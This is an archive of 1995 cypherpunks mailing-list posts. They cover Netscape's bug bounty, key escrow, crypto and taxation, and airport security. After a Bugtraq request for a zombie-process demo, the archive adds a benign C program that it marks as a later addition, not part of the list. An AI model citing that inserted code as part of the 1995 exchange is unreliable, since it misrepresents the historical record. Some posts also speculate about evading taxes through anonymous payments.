Message-ID: <199510151848.LAA22933@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> Eric Murray <ericm@lne.com> writes:
> What the hell is wrong with you people?  Up 'til a few months
> ago, the oft-heard refrain on cipherpunks was "why won't the

What do you mean "you people"?  There are <lots> of people on this list,
with lots of different opinions.  Don't attribute this kvetching to
Cypherpunks in general.  In fact, don't attribute <any> opinion to
Cypherpunks in general.  Probably most of the non-press members here share
an interest in helping people communicate privately, but that's about it.

We're all individuals here.
				[small voice in back of crowd: "I'm not."]

	Jim Gillogly
	24 Winterfilth S.R. 1995, 18:46




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Sat, 14 Oct 95 21:23:04 PDT
To: alano@teleport.com (Alan Olsen)
Subject: Re: airport security
In-Reply-To: <199510141621.JAA19984@desiree.teleport.com>
Message-ID: <199510150048.AA29926@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


Crypto relevance: none.

>I remember back during one of the previous FAA panics over terrorism.  I was
>at the Portland airport discussing the measures with an FAA inspector.  He
>explained why they had to have all the searches and stuff to stop anyone
>from blowing up the plane.  I pointed out to him that if anyone wanted to do
>that, they would just lay off a line of mortars from the hills overlooking
>the airport across the river.  He got very quiet and very worried...

Heh, one of our products gets a direct feed from the radar and flight track
info and displays it on a real time screen showing planes, noise levels and
other cutesy stuff in 3d. This sort of thing would be picked up and you could
replay over and over the dot of the mortar hitting the plane, or a SAM missile
coming up to the plane and both falling to the ground.

Normal use is for telling off pilots for flying outside the environmental
guidelines, or attaching resident complaints to flights but we have the odd
scare sitting in the databases. Problem is (??) that since Australia has such
high safety standards, we have to get all the booboo's from our international
sites.

Cheers,
Mark
mark@lochard.com.au



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Sun, 15 Oct 95 11:34:01 PDT
To: jya@pipeline.com (John Young)
Subject: Re: Netscape rewards are an insult
In-Reply-To: <199510151619.MAA25730@pipe4.nyc.pipeline.com>
Message-ID: <199510151855.OAA20783@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> Responding to msg by stripes@va.pubnix.com ("Josh M. Osborne") 
> on Sun, 15 Oct 12:0  AM
> 
> 
> The PR of Bugs Bounty is the aim, as the quick-market-adapter 
> Netscape Chair speechified in FR.
> 
> 
> Promoting the notion that hackers are earnestly attacking 
> Netscape and reporting its bugs increases its credibility to 
> the stock market porkers. Is that not why dear 
> all-too-attentive Jeff has been assigned duty on this list, 
> feeding peanuts to chimp hackers and champ newshacks?

Sir.

I'm afraid you're a little out of line here.
I've worked with Jeff at a couple different companies
over the last 6 years.  Besides being a very good programmer
he's also one of the people I consider the most resistant
to corporate bullstuff (believe me, we both got a lot of it at MicroUnity). 
I'm sure he's on this list because he thinks it's a good
idea to pay attention to it.


What the hell is wrong with you people?  Up 'til a few months
ago, the oft-heard refrain on cipherpunks was "why won't the
software vendors listen to us?"... now they're listening, and
pretty much all I see is complaints of "only a lousy thousand bucks!"
or "I sent this mail a whole two days ago and netscape hasn't opened
a dialog with me yet!"  or insulting their programmers for participating
on the list.   They're here, and listening, with real programmers
not PR weenies, and all most of you are doing is complaining.  


Yes, Netscrape turned getting hacked into a PR campaign via
the Bounty thing.  So?  You expected different?  PR is what
businesses do if they want to stay in business.   If you don't like
it you don't have to participate in the program.  If you think
that the token $1000 is insulting, you can give it to charity, or
go sell your hack for more $$ to Blacknet. :-)



-- 
Eric Murray  ericm@lne.com  ericm@motorcycle.com  http://www.lne.com/ericm
 Redistribution of this message without the author's permission is forbidden!
PGP keyid:E03F65E5 fingerprint:50 B0 A2 4C 7D 86 FC 03  92 E8 AC E6 7E 27 29 AF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Sun, 15 Oct 95 08:59:06 PDT
To: bugtraq@fc.net
Subject: I am looking for a way to create a zombie process
Message-ID: <9510151556.AA26716@all.net>
MIME-Version: 1.0
Content-Type: text


I am writing a paper that, among other things, talks about detecting
zombie processes.  I find that, due to my systematic hunting down and
eliminating of these processes, I no longer have any hanging around for
demonstration purposes.  How embarrassing - I don't know how to create
one!

Is there anyone who can give me a simple program or set of commands that
creates a zombie process? Thanks in advance. 

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236
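
[Added example, not part of the original message or of any reply on the list: a minimal C program that creates a zombie, confirms its state the way a detector would, and then reaps it. It assumes Linux with /proc mounted; the function names are illustrative.]

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L   /* for waitid() and WNOWAIT */
#endif
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Return the one-letter state from /proc/<pid>/stat ('R', 'S', 'Z', ...),
 * or 0 if the process has no /proc entry.  Linux-specific (assumption). */
static char proc_state(pid_t pid)
{
    char path[64], buf[512];
    snprintf(path, sizeof path, "/proc/%ld/stat", (long)pid);
    FILE *f = fopen(path, "r");
    if (!f)
        return 0;
    size_t n = fread(buf, 1, sizeof buf - 1, f);
    fclose(f);
    buf[n] = '\0';
    /* Layout is "pid (comm) state ...".  comm may itself contain spaces
     * or ')', so find the LAST ')' and take the field that follows it. */
    char *p = strrchr(buf, ')');
    if (!p || p[1] != ' ' || p[2] == '\0')
        return 0;
    return p[2];
}

/* Create a zombie: the child exits at once and the parent does not reap it.
 * Returns the child's pid, or -1 on failure. */
static pid_t make_zombie(void)
{
    /* If SIGCHLD is ignored the kernel reaps children automatically and
     * no zombie ever appears, so restore the default disposition. */
    signal(SIGCHLD, SIG_DFL);

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0)
        _exit(0);                 /* child: terminate immediately */

    /* WNOWAIT blocks until the child has exited but leaves its exit
     * status uncollected, so the child stays in the zombie state. */
    siginfo_t info;
    if (waitid(P_PID, (id_t)pid, &info, WEXITED | WNOWAIT) != 0)
        return -1;
    return pid;
}

/* Collect the exit status, which removes the zombie.  0 on success. */
static int reap(pid_t pid)
{
    int status;
    return waitpid(pid, &status, 0) == pid ? 0 : -1;
}

/* Full demonstration: *during receives the state seen while the child is
 * unreaped, *after the state seen once it has been reaped. */
int zombie_demo(char *during, char *after)
{
    pid_t pid = make_zombie();
    if (pid < 0)
        return -1;
    *during = proc_state(pid);
    if (reap(pid) != 0)
        return -1;
    *after = proc_state(pid);
    return 0;
}

int main(void)
{
    char during = 0, after = 0;
    if (zombie_demo(&during, &after) != 0) {
        perror("zombie_demo");
        return 1;
    }
    printf("state before reaping: %c\n", during);
    printf("state after reaping:  %s\n",
           after ? "still present" : "no /proc entry");
    return 0;
}
```

[A zombie holds only a process-table slot and its exit status; it disappears as soon as its parent calls wait, or once the parent exits and init adopts and reaps it.]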



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Sun, 15 Oct 95 09:00:44 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: Netscape rewards are an insult
In-Reply-To: <9510141801.AA01730@all.net>
Message-ID: <MAA21936.199510151600@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain


In message <9510141801.AA01730@all.net>, Dr. Frederick B. Cohen writes:
[...]
>The $25K is a trivial amount for finding such a hole in a product that
>is supposed to secure billions of dollars worth of electronic funds
>transfers.  If the bad guys find a hole, it could easily cost millions. 
>If you don't believe me, look at the statistics for other holes in the
>credit card and telecommunications businesses.  The losses are in the
>billions each year. 
[...]

Note well: Netscape is offering this reward for finding bugs in *beta*
release code.  In other words the code that they *know* crashes, code
that they suspect has security related bugs, code that they don't think
is (yet) good enough to charge a measly $40 for!

If they don't get buried in bad press for this, I would guess that they
may have a different program with a different set reward for finding bugs
in their for-sale version.  Or not.  After all I suspect that like most
other places they are more interested in making the next product the best
in the world than making the last one "as good as the box says".

Besides nobody said you have to report your bugs to Netscape just because
they gave you free software and offered some sort of reward for finding
bugs.  If you don't think the "pay" (including the possibility of having
the software fixed) is high enough, don't report the bugs.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: imschira@nyx10.cs.du.edu (Ian M. Schirado)
Date: Sun, 15 Oct 95 11:11:04 PDT
To: cypherpunks@toad.com
Subject: (fwd) CyberSpace Detective Agency
Message-ID: <9510151810.AA28127@nyx10.cs.du.edu>
MIME-Version: 1.0
Content-Type: text/plain


Path: mnemosyne.cs.du.edu!hermes.cair.du.edu!carbon!csn!gw1.att.com!gw2.att.com!news.midplains.net!chi-news.cic.net!newsfeed.internetmci.com!news.mathworks.com!newshost.marcam.com!Empire.Net!news.net99.net!news.crosslink.net!news.vais.net!ppp-b.vais.net!user
From: konowe@investigator.com (Dr. Lee Konowe)
Newsgroups: comp.infosystems.www.misc
Subject: CyberSpace Detective Agency
Date: Fri, 13 Oct 1995 10:18:14 -0700
Organization: Background Research International
Lines: 41
Message-ID: <konowe-1310951018140001@ppp-b.vais.net>
NNTP-Posting-Host: ppp-b.vais.net

Background Research International (B.R.I.) was the first online Detective
Agency to serve the Internet. B.R.I. is an affiliate of the FairFax Group,
Ltd. a world class corporate agency with offices and client firms
world-wide.  B.R.I. provides many of the information retrieval services,
first offered by the Fairfax Group and makes them available to small and
moderate sized businesses.

The purpose of this notice is to invite you to visit the B.R.I. home page at

http://www.investigator.com/bri

Our web page will introduce you to many of the B.R.I. services and explain
how a Public Records search firm can assist your company. Perhaps you are:

   

   

   
         BRI now offers the first resume verification service.  This 
         service means employees' resumes can now be verified prior to 
         submission to potential employers.

   

   

   


We believe you will be pleased with the many services offered and
surprised at the reasonable fee structure provided.

As an added incentive, when you decide to use our services, just tell your
B.R.I. investigator that you found out about B.R.I. from this newsgroup
and receive a 10% discount on your first order.

Sincerely,

Lee Konowe
Director/Internet Operations

--

--
http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
                 To be a skeptic is to refuse to be a victim.
       "This is my .sig. There are many like it, but this one is mine."
                            Freedom...yeah, right.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rick Busdiecker <rfb@lehman.com>
Date: Sun, 15 Oct 95 09:17:41 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Cybersecurity
In-Reply-To: <Pine.SUN.3.91.950925060508.23639B-100000@panix.com>
Message-ID: <9510151616.AA02567@cfdevx1.lehman.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

    Date: Sun, 15 Oct 1995 08:06:13 -0400 (EDT)
    From: Duncan Frissell <frissell@panix.com>

    I am also projecting a transition from physical to non-physical goods and
    services.  Thus most entertainment, financial services/investing,
    professional services, and indeed the rest of employment services will
    tend to be non-physical.  We see a lot of unbundling already in which
    services are split off from the more physical parts of a transaction.
    Drop shipping, contracting out, etc.

I agree with this projection as a shift in weight.  Presumably we can
also agree that the transition could never be total.  People will
continue to need and/or desire a significant number of physical goods
as well as services which involve the physical interaction.

    Say that it was 1750 and you were a French Physiocrat.  You might say
    that land and agriculture should
                              ^^^^^^

This single word represents a significant shift in the discussion.  Up
to this point, my understanding is that we were discussing what is,
and what we believe is possible in the future.  With the introduction
of `should' we veer away from that direction toward the more
philosophical.  While I enjoy philosophical discussions a great deal,
I doubt that we could find nearly as much common ground as we might if
we focussed on what is possible.  While I am a civil libertarian, I am
not an economic libertarian, as I believe you are.  I would expect
economic issues to be the focus of our differences in a philosophical
discussion, but they need not divide us in discussions outside of
philosophy.

    It is possible that the non-physical part of the economy will
    become much bigger than the physical.

I agree that this is quite possible.

    Note that most money itself is non-physical.

Agreed in part.  However, as we have seen already, non-physical
representations of money are not taken very seriously when it is
impossible, or even very difficult, to exchange them for physical
goods and services requiring physical interactions.  Very few people
would accept CyberBucks in exchange for a car.

    And if the physical part of the economy is taxed and the
    non-physical isn't the market will be skewed in favor of non-taxed
    activities.

Agreed.  This is at least partially true already.  Certainly there are
investment instruments which are treated differently by the various
tax codes.  These differences certainly affect investors' decisions.
Still, there seem to be investors willing to purchase instruments
based on features other than taxability.

    Also even though most people are geographically bound, if their
    consumption switches to non physical goods, they can acquire these goods
    anonymously or securely from any place on earth.  So even if you don't
    travel, the locus of your transactions can.

Agreed.  As I said originally, I believe that ready access to strong
cryptography will eventually make government tracking of purely
information, i. e. non-physical, transactions infeasible.  At that
point, any feasible system of taxation will have to focus on physical
goods and services which involve physical interaction.

--
Rick Busdiecker                        Please do not send electronic junk mail!
 net: rfb@lehman.com or rfb@cmu.edu    PGP Public Key: 0xDBD9994D
 www: http://www.cs.cmu.edu/afs/cs.cmu.edu/user/rfb/http/home.html
 send mail, subject "send index" for mailbot info, "send pgp key" gets my key
A `hacker' is one who writes code.  Breaking into systems is `cracking'.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Date: Sun, 15 Oct 95 09:17:42 PDT
To: cypherpunks@toad.com
Subject: Re: WWW> One If By Congress, Two If By White House
In-Reply-To: <45lt48$db4@shocker.mid.net>
Message-ID: <N5o1cD1w165w@left.webcasters.com>
MIME-Version: 1.0
Content-Type: text/plain


Path: left!hypnos!ragnarok.oar.net!malgudi.oar.net!kira.cc.uakron.edu!neoucom.edu!news.ysu.edu!news.ecn.uoknor.edu!paladin.american.edu!gatech!newsxfer.itd.umich.edu!tank.news.pipex.net!pipex!news.mathworks.com!newsfeed.internetmci.com!news.mid.net!news.mid.net!not-for-mail
From: Gleason Sackman <sackman@plains.nodak.edu>
Newsgroups: comp.internet.net-happenings
Subject: WWW> One If By Congress, Two If By White House
Message-ID: <45lt48$db4@shocker.mid.net>
Date: 13 Oct 1995 09:29:28 -0500
Sender: infoserv@news.mid.net
Organization: MIDnet, the Midwest's Gateway to the Global Internet.
Lines: 14
Approved: ralphie
NNTP-Posting-Host: shocker.mid.net

*** From Net-Happenings Moderator ***

Date: Fri, 6 Oct 1995 07:51:13 -0500
From: jrw@ix.netcom.com

http://www.geopages.com/CapitolHill/1783

A website dedicated to Jeffersonian Conservatism, the underlying
principle of which is a strong faith in the American people -- the
individual citizen -- rather than in an overgrown, cumbersome,
impersonal and too powerful bureaucracy.  Good links to the entire
political spectrum, government, books, etc.  The goal is to provoke
thoughtful discussion and informed political action.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 15 Oct 95 09:19:31 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
Message-ID: <199510151619.MAA25730@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by stripes@va.pubnix.com ("Josh M. Osborne") 
on Sun, 15 Oct 12:0  AM


The PR of Bugs Bounty is the aim, as the quick-market-adapter 
Netscape Chair speechified in FR.


Promoting the notion that hackers are earnestly attacking 
Netscape and reporting its bugs increases its credibility to 
the stock market porkers. Is that not why dear 
all-too-attentive Jeff has been assigned duty on this list, 
feeding peanuts to chimp hackers and champ newshacks?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brad Shantz" <bshantz@nwlink.com>
Date: Sun, 15 Oct 95 09:28:37 PDT
To: "Josh M. Osborne" <stripes@va.pubnix.com>
Subject: Re: Netscape rewards are an insult
Message-ID: <9510151627.AA15802@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Josh Osborne writes: 
> Note well: Netscape is offering this reward for finding bugs in *beta*
> release code.  In other words the code that they *know* crashes, code
> that they suspect has security related bugs, code that they don't think
> is (yet) good enough to charge a measly $40 for!

Whoops, wrong.  BETA does not mean code "they know crashes."  In fact 
it is quite the opposite.  This is pre-release code that they are bug 
fixing.  Most of the catastrophic bugs, they probably know about.  A 
BETA program is to increase the testing and quality assurance staff 
to find all of the bugs they DON'T know about.  Then, they will have a 
reasonable amount of time to fix those bugs before release.  It makes 
for a much more stable product.

Now, look at companies like SPRY/Compuserve or Logos Research 
Systems.  Both companies I have worked for.  SPRY didn't really have 
a BETA program that amounted to much until Internet in a Box version 
1.0.  Even that was a lame beta program.  Mostly internal use and 
testing.  Logos (a Bible software company) never even had a beta 
program.  As much as I like the guys at Logos, they released version 
2.0 recently and it's buggy.  Simple cosmetic things like not being 
able to "cancel" out of the options dialog, or "help" buttons taking 
you to wrong places in the help file, these are all things that would 
have been caught in a decent testing environment or a beta program.

Microsoft, who I don't necessarily like all the time, has a great 
beta program.  Usually it is several months to a year of intense 
testing, bug fixing, feature cleanup, usability testing, etc.  Their 
software may not be the best, but more often than not it is stable.

Anyway, I see Netscape's move to paying for beta testing will result 
in a more stable browser, and hopefully more secure software.

> If they don't get buried in bad press for this, I would guess that they
> may have a different program with a different set reward for finding bugs
> in their for-sale version.  

Why would they get bad press?

> Besides nobody said you have to report your bugs to Netscape just because
> they gave you free software and offered some sort of reward for finding
> bugs.  If you don't think the "pay" (including the possibility of having
> the software fixed) is high enough, don't report the bugs.

Once again, Josh, I'm afraid I have to disagree with you on this one. 
 Especially in regards to secure software.  I see your point, but...
Whether or not you have to report the bugs is immaterial.  Netscape 
is doing a service by making their app available for testing before 
saying "this is secure."  As a person who does business over the net, 
if I found out that my software was NOT secure, I would seek either a 
secure update or another company's software.  If  I'm happy with 
Netscape's software, I'll report the bugs to improve its quality.  
In my humble opinion, improving the software is reward enough.  Very 
few companies have paid beta programs.

I'd rather see bugs fixed before release than getting the bad press 
after release for shoddy workmanship.

Sorry this was so long.  I didn't mean to ramble.  I'll get off my 
soapbox now...

Brad


 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Sun, 15 Oct 95 13:27:27 PDT
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: My chat with Goeff Greiveldinger
In-Reply-To: <Pine.SUN.3.91.951015155856.4677D-100000@viper.law.miami.edu>
Message-ID: <199510152027.NAA23085@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> Michael Froomkin <froomkin@law.miami.edu> writes:
> I will be appearing with  Goeff Greiveldinger, he of the Justice Dept, at 
> a discussion of commercial key escrow next Thursday in Bethesda.  Anyone 
> with fun questions I should throw at him should contact me...

> Please note that the ostensible topic of this discussion is *commercial* 
> key escrow, not Clipper per se, so I have to be diplomatic....

You might try addressing the areas of liability for escrow agents.  If
private escrow agents can be sued for loss of information due to theft
or other authorized or unauthorized release of keys, their liability could
be horrendous, depending on the value of the compromised data. Gillogly
Software certainly will not be a commercial keyholder!

	Jim Gillogly
	24 Winterfilth S.R. 1995, 20:20




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sun, 15 Oct 95 10:56:26 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Crypto & Taxes [WAS Re: Cybersecurity]
In-Reply-To: <Pine.SUN.3.91.950925060508.23639B-100000@panix.com>
Message-ID: <Pine.SUN.3.91.951015135302.4606A-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 15 Oct 1995, Duncan Frissell wrote:
> On Sun, 24 Sep 1995, Rick Busdiecker wrote:
> > I'm guessing that you're talking about the fact that fully applied
> > crypto (e. g. fully anonymous digital cash) makes it essentially
> > impossible to base a tax system on income.
> Yep.
[....]
Hold on.  This is more "factoid" than "fact":  recall that income is PAID 
by people as well as EARNED by people.  Most payers have easily 
detectible physical presence and assets that can easily be attached by 
regulators.   It will be a cold day before, e.g., my employer agrees not 
to report my earnings.  And the same is true for most employers in most 
industries.  

And if it ever stops being true, we'll just get VAT, and VAT inspectors.  
So the line about death and taxes remains as true as ever, crypto or no.

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | New address, but it's still just as hot here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 15 Oct 95 11:42:49 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: what are these people selling????
In-Reply-To: <aca45d8413021004e721@[205.199.118.202]>
Message-ID: <199510151842.OAA28929@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> At 11:43 PM 10/13/95, Censored Girls Anonymous wrote:
> >I mean maybe we could get Microhard to do a meeting.
> >Or the dreaded RSA or somebody.
> 
> Jim Bidzos, President of RSADSI, attended our special "Clipper" meeting the
> weekend after Clipper was announced, in April 1993.
> 
> I'm not saying this in defense of RSADSI and their patent situation, just
> to note that they are not "dreaded."

Jim Bidzos and some of us might have interesting interactions on
patent issues, but I've got to emphasize that he's no demon. He's a
guy trying to make a buck on his patent properties -- by and large he
has the same interests about seeing cryptography spread that the rest
of us do.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sun, 15 Oct 95 11:51:00 PDT
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: Crypto & Taxes [WAS Re: Cybersecurity]
In-Reply-To: <Pine.SUN.3.91.951015135302.4606A-100000@viper.law.miami.edu>
Message-ID: <Pine.SUN.3.91.951015141533.18407A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 15 Oct 1995, Michael Froomkin wrote:

> On Sun, 15 Oct 1995, Duncan Frissell wrote:
> > On Sun, 24 Sep 1995, Rick Busdiecker wrote:
> > > I'm guessing that you're talking about the fact that fully applied
> > > crypto (e. g. fully anonymous digital cash) makes it essentially
> > > impossible to base a tax system on income.
> > Yep.
> [....]
> Hold on.  This is more "factoid" than "fact":  recall that income is PAID 
> by people as well as EARNED by people.  Most payers have easily 
> detectible physical presence and assets that can easily be attached by 
> regulators.   It will be a cold day before, e.g., my employer agrees not 
> to report my earnings.  And the same is true for most employers in most 
> industries.  

Were I an overseas employer, I would be quite happy to work in a 
"disinterested" jurisdiction and hire American workers to telecommute and 
issue their pay blindly to the number only or crypto bank account of their 
choice and promptly encrypt or lose the records.

Remember, there is an incentive for employERS as well as employees to 
flee the tax system of a nation that is manipulative of it.  Employers 
who work in tax free ways will be able to pay their employees less, quite 
a bit less.  Given a 32% tax rate, an employer with the advantage of no 
income reporting on employees will easily be able to drop a given salary 
25% and attract employees quite easily.

Who are you going to work for?  The publisher who is based in New York 
and reports all payments, or the publisher who works in the Cayman 
Islands, reports nothing, and merely sells the manuscript to the big name 
publisher in New York after purchasing it blind from you?

> And if it ever stops being true, we'll just get VAT, and VAT inspectors.  
> So the line about death and taxes remains as true as ever, crypto or no.
> 

I believe it will be extremely hard for VAT inspectors, in future, to 
determine one of a few things needed to assess VAT taxes.

1> Identity of employers within their jurisdiction
2> Identity of employees within their jurisdiction
3> Who is working "IN" their jurisdiction
4> Who is a U.S. citizen

How can you say that the 2 meg random data file that Mr. X sent to 
Publishing Company B is worth $2mil?  That the encrypted letter to client 
Q is the sum of legal work worth $80,000 in services and research?  These 
are particularly difficult to determine when the bank transactions are 
made with truly anonymous e-cash and overseas accounts.  It's simply not 
possible unless:

1>  The state has enforced toy crypto
2>  The strong crypto the parties use is broken
3>  The parties tell.

At some point, the only thing you're going to be able to tax is "Goods."  
As in solid and measurable.

When this is true, the most profitable venture in the United States will 
be retail smuggling.  And as taxes are raised again and again, compliance 
will drop and drop until the largest portion of the national budget will 
be enforcement of the Value Tax Reform and Retail Laundering and 
Terrorism Act of 2002.

Again, the more difficult it gets to do business in the United States 
without taxation far out of proportion to other nation states, the fewer 
companies will stick around.  I might add that as technology progresses, 
fewer and fewer companies will NEED to work in the United States.

What I have not discussed here are the various political problems 
involved.  I admit they exist, but I haven't quite come to a conclusion 
of how the balance between government self preservation and blind 
and secure transactions will balance out.  I believe in part it rests on 
how much the United States will be willing to abide by various 
constitutional provisions.  Americans are going to have to decide if 
they really believe in free speech and freedom, a question which has 
begun to surface quite obviously of late.

It will literally take a dictatorship to enforce taxation in any real 
way in 15 years, if not sooner.  VAT, income, sales tax, or otherwise.

> A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
> U. Miami School of Law     | froomkin@law.miami.edu
> P.O. Box 248087            | http://www.law.miami.edu/~froomkin
> Coral Gables, FL 33124 USA | New address, but it's still just as hot here.

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sun, 15 Oct 95 15:26:11 PDT
To: Black Unicorn <unicorn@polaris.mindport.net>
Subject: Re: Crypto & Taxes [WAS Re: Cybersecurity]
In-Reply-To: <Pine.SUN.3.91.951015141533.18407A-100000@polaris.mindport.net>
Message-ID: <Pine.SUN.3.91.951015151343.25547F-100000@crl.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

On Sun, 15 Oct 1995, Black Unicorn wrote:

> At some point, the only thing you're going to be able to tax is "Goods."  
> As in solid and measurable.
> 
> When this is true, the most profitable venture in the United States will 
> be retail smuggling.  And as taxes are raised again and again, compliance 
> will drop and drop until the largest portion of the national budget will 
> be enforcement of the Value Tax Reform and Retail Laundering and 
> Terrorism Act of 2002.

There is an article in this week's issue of THE EUROPEAN about
cigarette smuggling in Europe.  There is some regulatory
arbitrage from south to north because of disparities in the
local taxes on tobacco, but the big "problem" is American
cigarettes.  Since even in the lowest tax European countries
taxes make up 70% of the retail price of cigarettes, there is
huge incentive to smuggle in US smokes.  Makes me proud to be
an American.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher J. Shaulis" <cjs@netcom.com>
Date: Sun, 15 Oct 95 13:57:28 PDT
To: tedwards@Glue.umd.edu (Thomas Grant Edwards)
Subject: Re: Netscape rewards are an insult
In-Reply-To: <Pine.SUN.3.91.951015160352.19623D-100000@volt.isr.umd.edu>
Message-ID: <199510151944.PAA00705@localhost.cjs.net>
MIME-Version: 1.0
Content-Type: text


> On Sun, 15 Oct 1995, Eric Murray wrote:
> 
> > What the hell is wrong with you people?  Up 'til a few months
> > ago, the oft-heard refrain on cipherpunks was "why won't the
> > software vendors listen to us?"
> 
> I have to agree with Eric.  We now have software vendors talking about 
> releasing more security source, taking bug reports seriously, etc.
> We are winning for crypto here.

Let's see if we can't get Microsoft some bad press. If they were to
start taking the quality of their software seriously, we would be
winning one for god, the queen, and the common good of all mankind.

Christopher




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Sun, 15 Oct 95 12:58:22 PDT
To: anonymous-remailer@shell.portal.com
Subject: Re: PA Remailer Concerns
In-Reply-To: <199510150647.XAA25530@jobe.shell.portal.com>
Message-ID: <Pine.SUN.3.91.951015155654.19623C-100000@volt.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 14 Oct 1995 anonymous-remailer@shell.portal.com wrote:

> I would be surprised if they were singling out anonymous remailers. 
>They may have had other concerns regarding phone abuse, e.g., long
>distance fraud.  

I am sure no PA state legislator knows what an anonymous remailer is.
They have just made them illegal though.  The question is, will the police
ever figure out what they are, and will they ever bother to selectively
enforce the law.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Sun, 15 Oct 95 13:00:34 PDT
To: cypherpunks <cypherpunks@toad.com>
Subject: My chat with  Goeff Greiveldinger
Message-ID: <Pine.SUN.3.91.951015155856.4677D-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


I will be appearing with  Goeff Greiveldinger, he of the Justice Dept, at 
a discussion of commercial key escrow next Thursday in Bethesda.  Anyone 
with fun questions I should throw at him should contact me...

Please note that the ostensible topic of this discussion is *commercial* 
key escrow, not Clipper per se, so I have to be diplomatic....

A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | New address, but it's still just as hot here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Sun, 15 Oct 95 13:05:57 PDT
To: Eric Murray <ericm@lne.com>
Subject: Re: Netscape rewards are an insult
In-Reply-To: <199510151855.OAA20783@slack.lne.com>
Message-ID: <Pine.SUN.3.91.951015160352.19623D-100000@volt.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 15 Oct 1995, Eric Murray wrote:

> What the hell is wrong with you people?  Up 'til a few months
> ago, the oft-heard refrain on cipherpunks was "why won't the
> software vendors listen to us?"

I have to agree with Eric.  We now have software vendors talking about 
releasing more security source, taking bug reports seriously, etc.
We are winning for crypto here.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rosaphil <rugosa@escape.com>
